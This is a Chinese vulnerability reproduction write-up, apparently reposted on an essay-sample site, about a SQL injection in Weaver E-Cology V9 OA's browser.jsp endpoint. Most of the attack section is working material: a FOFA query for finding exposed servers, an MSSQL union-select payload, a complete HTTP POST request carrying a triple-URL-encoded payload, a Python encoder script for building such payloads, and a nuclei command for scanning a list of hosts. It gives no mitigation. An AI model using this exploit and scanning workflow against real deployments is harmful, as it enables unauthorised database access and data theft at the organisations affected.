100字范文,内容丰富有趣,生活中的好帮手!
100字范文XML网站地图
全站
首页 50字 100字 200字 300字 400字 500字 600字 700字 800字 900字 1000字 1200字 1500字
推荐专题:
100字范文 > 漏洞复现 泛微OA E-Cology V9 browser.jsp SQL注入漏洞

漏洞复现 泛微OA E-Cology V9 browser.jsp SQL注入漏洞

时间:2024-03-08 12:55:17

相关推荐

漏洞复现 泛微OA E-Cology V9 browser.jsp SQL注入漏洞

漏洞复现 泛微OA E-Cology V9 browser.jsp SQL注入漏洞

漏洞描述

泛微新一代移动办公平台e-cology不仅组织提供了一体化的协同工作平台,将组织事务逐渐实现全程电子化,改变传统纸质文件、实体签章的方式。泛微OA E-Cology 平台browser.jsp处存在SQL注入漏洞,攻击者通过漏洞可以获取服务器数据库权限。

漏洞复现

fofa:app="泛微-协同商务系统"

1.使用POC查看当前数据库版本,返回结果

1.MSSQL命令:a' union select 1,''+(SELECT @@VERSION)+'2.POCPOST /mobile/%20/plugin/browser.jsp HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/0101 Firefox/104.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 649DNT: 1Connection: closeCookie: ecology_JSessionid=aaaDJa14QSGzJhpHl4Vsy; JSESSIONID=aaaDJa14QSGzJhpHl4Vsy; __randcode__=28dec942-50d2-486e-8661-3e613f71028aUpgrade-Insecure-Requests: 1isDis=1&browserTypeId=269&keyword=%2525%2536%2531%2525%2532%2537%2525%2532%2530%2525%2537%2535%2525%2536%2565%2525%2536%2539%2525%2536%2566%2525%2536%2565%2525%2532%2530%2525%2537%2533%2525%2536%2535%2525%2536%2563%2525%2536%2535%2525%2536%2533%2525%2537%2534%2525%2532%2530%2525%2533%2531%2525%2532%2563%2525%2532%2537%2525%2532%2537%2525%2532%2562%2525%2532%2538%2525%2535%2533%2525%2534%2535%2525%2534%2563%2525%2534%2535%2525%2534%2533%2525%2535%2534%2525%2532%2530%2525%2534%2530%2525%2534%2530%2525%2535%2536%2525%2534%2535%2525%2535%2532%2525%2535%2533%2525%2534%2539%2525%2534%2566%2525%2534%2565%2525%2532%2539%2525%2532%2562%2525%2532%2537

2.编写并使用三次url全字符加密编码的小脚本,如下

1命令:python Fanwei_e-cology9_decode_three.py2.脚本import osdef main():clearFlag = "y"while(1):if clearFlag == "y" or clearFlag == "Y":os.system("cls")clearFlag = ""string = input("请输入需要转换的字符串 :")type = input("(输入1:进行三次url全字符编码 ) :")while(type != "1"):type = input("操作类型输入错误(输入1:进行三次url全字符编码) :")if type == "1" :for i in range(3):string = encode(string)encode_string = stringprint("编码结果为:"+encode_string+"\n")#编码def encode(string):encode_string = ""for char in string:encode_char = hex(ord(char)).replace("0x","%")encode_string += encode_charreturn encode_stringmain()

2.nuclei验证

nuclei.exe -t FanWeiOA_E-Cology9_browser_SQL.yaml -l subs.txt -stats

本内容不代表本网观点和政治立场,如有侵犯你的权益请联系我们处理。
网友评论
网友评论仅供其表达个人看法,并不表明网站立场。
相关阅读
泛微E-Cology SQL注入漏洞复现(QVD--15672)

泛微E-Cology SQL注入漏洞复现(QVD--15672)

2019-03-17

泛微e-cology9 SQL注入漏洞复现(QVD--5012)

泛微e-cology9 SQL注入漏洞复现(QVD--5012)

2018-10-24

泛微e-cology9 SQL注入漏洞复现(QVD--5012)

泛微e-cology9 SQL注入漏洞复现(QVD--5012)

2023-09-16

泛微OA V8 SQL注入漏洞和文件上传漏洞

泛微OA V8 SQL注入漏洞和文件上传漏洞

2020-11-29

扩展阅读

泛微OA协同

使用JSP编写简单网站:利用JSP实现一个动态网站

腾讯企业微信 泛微在移动办公领域展开合作

jsp试题及答案

jsp试题及答案

jsp实训心得总结

最近发布
大专毕业生自我鉴定100字(精选19篇)

大专毕业生自我鉴定100字(精选19篇)

2024-08-05

如何让第一次洗碗成为一次难忘的经历:探索我与家务之间的新世界

如何让第一次洗碗成为一次难忘的经历:探索我与家务之间的新世界

2024-08-05

家庭团聚 传统庆祝:春节100字作文精选合集

家庭团聚 传统庆祝:春节100字作文精选合集

2024-08-05

二年级日记国庆节100字 - 小学作文

二年级日记国庆节100字 - 小学作文

2024-08-04

中秋节全家赏月作文100字

中秋节全家赏月作文100字

2024-08-04

探寻自我与爱的道路——读简爱心得分享

探寻自我与爱的道路——读简爱心得分享

2024-08-04

推荐专题
故事作文100字 我的愿望100字左右 考试反思100字语文 英语影评100字 描写春雨的段落100字 难忘的一节课100字 我喜欢的动物100字 猫 孔子的故事100字左右 反思日记100字 关于风景的作文100字 我喜欢的动物小狗100字 开学趣事100字 妈妈笑了100字 每日随笔100字 科学家的故事100个字
猜你喜欢:
100字古诗文 安全周记100字左右 个人简历100字 动作描写100字 收玉米日记100字 医生自我评价100字 大一自我鉴定100字 心得体会100字作文 初一军训日记100字 寒假日记大全100字 秋天的美文100字 碰碰车日记100字 春季运动会加油稿100字 放风筝日记100字作文 英语旅游日记100字 小学毕业感言100字 她笑了作文100字 一篇游记100字 暑假感悟100字 抗日故事100字 感恩母亲的句子100字 禁毒小故事100字 我的朋友结尾100字 刘禹锡生平简介100字 防溺水视频观后感100字 秋天来了100个字 下雨的作文100字 藤野先生主要内容100字 二年级下册作文100字 班级趣事100字
展开

100字范文 免责声明© 2024 All Rights Reserved.

湘ICP备2024057051号网站地图XML

© 2024 All Rights Reserved.

100字范文 免责声明